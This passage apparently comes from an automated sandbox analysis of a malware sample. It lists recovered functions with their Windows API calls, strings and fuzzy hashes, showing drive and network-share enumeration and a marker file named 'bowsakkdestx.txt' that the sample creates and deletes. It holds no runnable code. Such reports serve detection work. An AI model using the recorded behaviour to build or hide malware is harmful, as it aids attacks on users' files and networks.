                                                                                        • Part of subcall function 004251B7: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00425154,00423FFE,00507990,00000014), ref: 00428B62
                                                                                        • Part of subcall function 004251B7: _free.LIBCMT ref: 00428B69
                                                                                        • Part of subcall function 004251B7: DeleteCriticalSection.KERNEL32(0050AC00,?,?,00425154,00423FFE,00507990,00000014), ref: 00428B8B
                                                                                      • __calloc_crt.LIBCMT ref: 00425174
                                                                                      • __initptd.LIBCMT ref: 00425196
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0042519D
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                      • String ID:
                                                                                      • API String ID: 3567560977-0
                                                                                      • Opcode ID: f4c69a70138d13d529c748345770976310cf81374b45ffcda2b41016945d7593
                                                                                      • Instruction ID: 366d1241f395ce705af539ece55ec53f654f371a685379b5f067519d47a60e56
                                                                                      • Opcode Fuzzy Hash: f4c69a70138d13d529c748345770976310cf81374b45ffcda2b41016945d7593
                                                                                      • Instruction Fuzzy Hash: 75F0CD32B4AB712DE2343AB67D03B6B2680AF00738BA1061FF064C42D1EF388401455C
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • __lock.LIBCMT ref: 0042594A
                                                                                        • Part of subcall function 00428AF7: __mtinitlocknum.LIBCMT ref: 00428B09
                                                                                        • Part of subcall function 00428AF7: __amsg_exit.LIBCMT ref: 00428B15
                                                                                        • Part of subcall function 00428AF7: EnterCriticalSection.KERNEL32(i;B,?,004250D7,0000000D), ref: 00428B22
                                                                                      • _free.LIBCMT ref: 00425970
                                                                                        • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                                                                                        • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                                                                                      • __lock.LIBCMT ref: 00425989
                                                                                      • ___removelocaleref.LIBCMT ref: 00425998
                                                                                      • ___freetlocinfo.LIBCMT ref: 004259B1
                                                                                      • _free.LIBCMT ref: 004259C4
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: __lock_free$CriticalEnterErrorFreeHeapLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                                                                      • String ID:
                                                                                      • API String ID: 626533743-0
                                                                                      • Opcode ID: c56b173b0890e450cc2a22b220cebe42ac0930fc8d6ccd74ffd4a749de21d878
                                                                                      • Instruction ID: 81c7b0a8007453265eca5a285afc690957d7e654b57493ebbede42104a270bc8
                                                                                      • Opcode Fuzzy Hash: c56b173b0890e450cc2a22b220cebe42ac0930fc8d6ccd74ffd4a749de21d878
                                                                                      • Instruction Fuzzy Hash: E801A1B1702B20E6DB34AB69F446B1E76A0AF10739FE0424FE0645A1D5CFBD99C0CA5D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • ___from_strstr_to_strchr.LIBCMT ref: 004507C3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ___from_strstr_to_strchr
                                                                                      • String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
                                                                                      • API String ID: 601868998-2416195885
                                                                                      • Opcode ID: 46bb62eb4ffcb3ef403e86853a7eb45dbe6c4dfbd3a8551aa62d907c1259c874
                                                                                      • Instruction ID: 4fd155d7ac4cfc4ad9107eba643b63d3b81161049ee91e28a54c83c9030a6459
                                                                                      • Opcode Fuzzy Hash: 46bb62eb4ffcb3ef403e86853a7eb45dbe6c4dfbd3a8551aa62d907c1259c874
                                                                                      • Instruction Fuzzy Hash: F64109756043055BDB20EE25CC45BAFB7D8EF85309F40082FF98593242E679E90C8B96
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _memset
                                                                                      • String ID: .\crypto\buffer\buffer.c$g9F
                                                                                      • API String ID: 2102423945-3653307630
                                                                                      • Opcode ID: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
                                                                                      • Instruction ID: 958ac6a2dbe7618ecd56aaf11cdfe4c63fb5daf7b6a990d4d23814bb8d8bf6ac
                                                                                      • Opcode Fuzzy Hash: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
                                                                                      • Instruction Fuzzy Hash: 27212BB6B403213FE210665DFC43B66B399EB84B15F10413BF618D73C2D6A8A865C3D9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _fprintf_memset
                                                                                      • String ID: .\crypto\pem\pem_lib.c$Enter PEM pass phrase:$phrase is too short, needs to be at least %d chars
                                                                                      • API String ID: 3021507156-3399676524
                                                                                      • Opcode ID: ecf0358a9dba2a972d623e611d8bee7a2e74e734002f68b3a08fbe7946495174
                                                                                      • Instruction ID: 90c6fe5d672865ace0ee8fbe81ed9b43ee89a432c17a94ace257beddb0b51c59
                                                                                      • Opcode Fuzzy Hash: ecf0358a9dba2a972d623e611d8bee7a2e74e734002f68b3a08fbe7946495174
                                                                                      • Instruction Fuzzy Hash: 0E218B72B043513BE720AD22AC01FBB7799CFC179DF04441AFA54672C6E639ED0942AA
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C51B
                                                                                      • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C539
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Path$AppendFolder
                                                                                      • String ID: bowsakkdestx.txt
                                                                                      • API String ID: 29327785-2616962270
                                                                                      • Opcode ID: ba6770418a514e061c64693ffdbf2edbdfd545916963a0667ce2a0b7d493bc5b
                                                                                      • Instruction ID: a05810460da3035b09b2d6f50620da2975429261b58b3288bff945a9ad0f9da5
                                                                                      • Opcode Fuzzy Hash: ba6770418a514e061c64693ffdbf2edbdfd545916963a0667ce2a0b7d493bc5b
                                                                                      • Instruction Fuzzy Hash: 281127B2B4023833D930756A7C87FEB735C9B42725F4001B7FE0CA2182A5AE554501E9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • WNetOpenEnumW.MPR(00000002,00000000,00000000,?,?), ref: 00410C12
                                                                                      • GlobalAlloc.KERNEL32(00000040,00004000,?,?), ref: 00410C39
                                                                                      • _memset.LIBCMT ref: 00410C4C
                                                                                      • WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00410C63
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Enum$AllocGlobalOpenResource_memset
                                                                                      • String ID:
                                                                                      • API String ID: 364255426-0
                                                                                      • Opcode ID: c593f9ddfc12760f3eff0e8065bbbd6a980f194dc76d13cdd9d46ce453e91173
                                                                                      • Instruction ID: bd97fe2cb621df6ca28f66a093f1f6e361520364a30ff1ea4190286e2c40543e
                                                                                      • Opcode Fuzzy Hash: c593f9ddfc12760f3eff0e8065bbbd6a980f194dc76d13cdd9d46ce453e91173
                                                                                      • Instruction Fuzzy Hash: 0F91B2756083418FD724DF55D891BABB7E1FF84704F14891EE48A87380E7B8A981CB5A
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • __getenv_helper_nolock.LIBCMT ref: 00441726
                                                                                      • _strlen.LIBCMT ref: 00441734
                                                                                        • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                                                                                      • _strnlen.LIBCMT ref: 004417BF
                                                                                      • __lock.LIBCMT ref: 004417D0
                                                                                      • __getenv_helper_nolock.LIBCMT ref: 004417DB
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: __getenv_helper_nolock$__getptd_noexit__lock_strlen_strnlen
                                                                                      • String ID:
                                                                                      • API String ID: 2168648987-0
                                                                                      • Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                                                                                      • Instruction ID: 706a9fbf285425ec29b4e33d2635255339e15eb248031f995e6227ac9da9c0f4
                                                                                      • Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                                                                                      • Instruction Fuzzy Hash: A131FC31741235ABEB216BA6EC02B9F76949F44B64F54015BF814DB391DF7CC88046AD
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • GetLogicalDrives.KERNEL32 ref: 00410A75
                                                                                      • SetErrorMode.KERNEL32(00000001,00500234,00000002), ref: 00410AE2
                                                                                      • PathFileExistsA.SHLWAPI(?), ref: 00410AF9
                                                                                      • SetErrorMode.KERNEL32(00000000), ref: 00410B02
                                                                                      • GetDriveTypeA.KERNEL32(?), ref: 00410B1B
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorMode$DriveDrivesExistsFileLogicalPathType
                                                                                      • String ID:
                                                                                      • API String ID: 2560635915-0
                                                                                      • Opcode ID: 6431ecd4352623c8ea5b40f1f1ea1a8b08bc26eb066019d8721179985482c109
                                                                                      • Instruction ID: e48b338c548d72163c5ae3f73f283317dfaad29deff82c686574d6b9df2ed0f8
                                                                                      • Opcode Fuzzy Hash: 6431ecd4352623c8ea5b40f1f1ea1a8b08bc26eb066019d8721179985482c109
                                                                                      • Instruction Fuzzy Hash: 6141F271108340DFC710DF69C885B8BBBE4BB85718F500A2EF089922A2D7B9D584CB97
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • _malloc.LIBCMT ref: 0043B70B
                                                                                        • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                        • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                        • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00800000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                      • _free.LIBCMT ref: 0043B71E
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap_free_malloc
                                                                                      • String ID:
                                                                                      • API String ID: 1020059152-0
                                                                                      • Opcode ID: 8e512132b4ba77e80ced0f8d2c599a4ead77bd4eaf6f4183de6e41df743542ab
                                                                                      • Instruction ID: cebe638eb0ed40525ab660a1b273922ca7a171140340163af9fc546bca46de76
                                                                                      • Opcode Fuzzy Hash: 8e512132b4ba77e80ced0f8d2c599a4ead77bd4eaf6f4183de6e41df743542ab
                                                                                      • Instruction Fuzzy Hash: F411EB31504725EBCB202B76BC85B6A3784DF58364F50512BFA589A291DB3C88408ADC
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                      • String ID:
                                                                                      • API String ID: 1380987712-0
                                                                                      • Opcode ID: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
                                                                                      • Instruction ID: 8330a25206e7a7c758b309db49295e470543d34b7ed76d4368c5dbe794fa98e6
                                                                                      • Opcode Fuzzy Hash: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
                                                                                      • Instruction Fuzzy Hash: 5C01DB35A4030876EB30AB55EC86FD63B6DE744B00F148022FE04AB1E1D7B9A54ADB98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                      • String ID:
                                                                                      • API String ID: 1380987712-0
                                                                                      • Opcode ID: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
                                                                                      • Instruction ID: 59d9cfd0379212e31388a7928d285390ad7449125cd170d7d310b1f6820545b5
                                                                                      • Opcode Fuzzy Hash: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
                                                                                      • Instruction Fuzzy Hash: 3301DB35B4030976E720AB51EC86FD67B6DE744B04F144011FE04AB1E1D7F9A549CB98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _memmove
                                                                                      • String ID: invalid string position$string too long
                                                                                      • API String ID: 4104443479-4289949731
                                                                                      • Opcode ID: 1860cadd0784f8812835e732d2f60387060861baec5cac242feb419a09eb11c6
                                                                                      • Instruction ID: c789d4a5c221ce0c411dffae1b259be01e75b302f83ceaf2f45b858c9c7e4579
                                                                                      • Opcode Fuzzy Hash: 1860cadd0784f8812835e732d2f60387060861baec5cac242feb419a09eb11c6
                                                                                      • Instruction Fuzzy Hash: 3D311430300204ABDB28DE5CD8859AA77B6EFC17507600A5EF865CB381D739EDC18BAD
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _wcsnlen
                                                                                      • String ID: U
                                                                                      • API String ID: 3628947076-3372436214
                                                                                      • Opcode ID: b6ca082fea440d1ca5cff6801f17e255d65e87a8c4bbbad4e9973a502f76dbd1
                                                                                      • Instruction ID: 96f9a77ca4cc4fe958c434aa827cb810c13d5acf0ea92317e974609e7887e837
                                                                                      • Opcode Fuzzy Hash: b6ca082fea440d1ca5cff6801f17e255d65e87a8c4bbbad4e9973a502f76dbd1
                                                                                      • Instruction Fuzzy Hash: 6521C9717046286BEB10DAA5BC41BBB739CDB85750FD0416BFD08C6190EA79994046AD
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _memset
                                                                                      • String ID: .\crypto\buffer\buffer.c$C7F
                                                                                      • API String ID: 2102423945-2013712220
                                                                                      • Opcode ID: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
                                                                                      • Instruction ID: 54406e9f1970e0e1dce797ef07034894a3cffcceb7efccd845a222dac3d76e8e
                                                                                      • Opcode Fuzzy Hash: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
                                                                                      • Instruction Fuzzy Hash: 91216DB1B443213BE200655DFC83B15B395EB84B19F104127FA18D72C2D2B8BC5982D9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Strings
                                                                                      • 8a4577dc-de55-4eb5-b48a-8a3eee60cd95, xrefs: 0040C687
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: StringUuid$CreateFree
                                                                                      • String ID: 8a4577dc-de55-4eb5-b48a-8a3eee60cd95
                                                                                      • API String ID: 3044360575-2335240114
                                                                                      • Opcode ID: 5898d431aa7bc51d8275c67bd3d0945cf80b17b08d4c1006f571a635e441fa64
                                                                                      • Instruction ID: 0eb901185732211e3be4e37390737b2086ad5c5ed8a4bd7d6c842829bf201ec1
                                                                                      • Opcode Fuzzy Hash: 5898d431aa7bc51d8275c67bd3d0945cf80b17b08d4c1006f571a635e441fa64
                                                                                      • Instruction Fuzzy Hash: 6C21D771208341ABD7209F24D844B9BBBE8AF81758F004E6FF88993291D77A9549879A
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C48B
                                                                                      • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C4A9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Path$AppendFolder
                                                                                      • String ID: bowsakkdestx.txt
                                                                                      • API String ID: 29327785-2616962270
                                                                                      • Opcode ID: cacc9ec5c69f508a09e097335cbe8ae863f85dc58f645bd4f6fa7f4b17594c00
                                                                                      • Instruction ID: 3b6c08389df4e48a430741a1ce4ce94f3584f996b8880ee9781e1533d320f445
                                                                                      • Opcode Fuzzy Hash: cacc9ec5c69f508a09e097335cbe8ae863f85dc58f645bd4f6fa7f4b17594c00
                                                                                      • Instruction Fuzzy Hash: 8701DB72B8022873D9306A557C86FFB775C9F51721F0001B7FE08D6181E5E9554646D5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C438
                                                                                      • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C44E
                                                                                      • DeleteFileA.KERNEL32(?), ref: 0040C45B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Path$AppendDeleteFileFolder
                                                                                      • String ID: bowsakkdestx.txt
                                                                                      • API String ID: 610490371-2616962270
                                                                                      • Opcode ID: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
                                                                                      • Instruction ID: 22f96f022367e4ecd8cb06d74e3ea6c1a096c1ee21cc35b9366b07434c4c4e8f
                                                                                      • Opcode Fuzzy Hash: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
                                                                                      • Instruction Fuzzy Hash: 60E0807564031C67DB109B60DCC9FD5776C9B04B01F0000B2FF48D10D1D6B495444E55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _memmove_strtok
                                                                                      • String ID:
                                                                                      • API String ID: 3446180046-0
                                                                                      • Opcode ID: 205b1ec61ce906ac0e6ef9ac2fb6feb778f8951e500b67679f42a44b4349684c
                                                                                      • Instruction ID: d0e58e2a66e8e3875a5229d26ee444e1e0210206766639419d48370c530ec9d7
                                                                                      • Opcode Fuzzy Hash: 205b1ec61ce906ac0e6ef9ac2fb6feb778f8951e500b67679f42a44b4349684c
                                                                                      • Instruction Fuzzy Hash: 7F81B07160020AEFDB14DF59D98079ABBF1FF14304F54492EE40567381D3BAAAA4CB96
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                                                                                      • String ID:
                                                                                      • API String ID: 2974526305-0
                                                                                      • Opcode ID: 2663944f2ecd2356e6bc0f9128c733698aaf16daf3cf10d514d26d316ebfdedf
                                                                                      • Instruction ID: 8e6e0b0b404069c1ace538d88af1fa9e5aae20a8402e44ab6f3f0d96efeb0f41
                                                                                      • Opcode Fuzzy Hash: 2663944f2ecd2356e6bc0f9128c733698aaf16daf3cf10d514d26d316ebfdedf
                                                                                      • Instruction Fuzzy Hash: 9A51D830B00225FBCB148E69AA40A7F77B1AF11320F94436FF825963D0D7B99D61CB69
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0043C6AD
                                                                                      • __isleadbyte_l.LIBCMT ref: 0043C6DB
                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043C709
                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043C73F
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                      • String ID:
                                                                                      • API String ID: 3058430110-0
                                                                                      • Opcode ID: 5d9d0dd00b9c666e2ffb8edf641007e90d7f333e82c154efbd4b40f2329fca1d
                                                                                      • Instruction ID: 9bb69ce0c337472f3e835d3bfc0adb25a23875f1fe15b1d3b69bac0ae3c4b713
                                                                                      • Opcode Fuzzy Hash: 5d9d0dd00b9c666e2ffb8edf641007e90d7f333e82c154efbd4b40f2329fca1d
                                                                                      • Instruction Fuzzy Hash: 4E31F530600206EFDB218F75CC85BBB7BA5FF49310F15542AE865A72A0D735E851DF98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0040F125
                                                                                      • lstrlenA.KERNEL32(?,?,00000000), ref: 0040F198
                                                                                      • WriteFile.KERNEL32(00000000,?,00000000), ref: 0040F1A1
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040F1A8
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: File$CloseCreateHandleWritelstrlen
                                                                                      • String ID:
                                                                                      • API String ID: 1421093161-0
                                                                                      • Opcode ID: d7c53c20fb31498ecb2e6d2948be234b538ea12271a6e43a57747494780a16e1
                                                                                      • Instruction ID: 4e0a1a2928686de7afe91093b481d52cb6f90b47dd46c4e49af8be4df8d63ea4
                                                                                      • Opcode Fuzzy Hash: d7c53c20fb31498ecb2e6d2948be234b538ea12271a6e43a57747494780a16e1
                                                                                      • Instruction Fuzzy Hash: DF31F531A00104EBDB14AF68DC4ABEE7B78EB05704F50813EF9056B6C0D7796A89CBA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • ___BuildCatchObject.LIBCMT ref: 004C70AB
                                                                                        • Part of subcall function 004C77A0: ___BuildCatchObjectHelper.LIBCMT ref: 004C77D2
                                                                                        • Part of subcall function 004C77A0: ___AdjustPointer.LIBCMT ref: 004C77E9
                                                                                      • _UnwindNestedFrames.LIBCMT ref: 004C70C2
                                                                                      • ___FrameUnwindToState.LIBCMT ref: 004C70D4
                                                                                      • CallCatchBlock.LIBCMT ref: 004C70F8
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
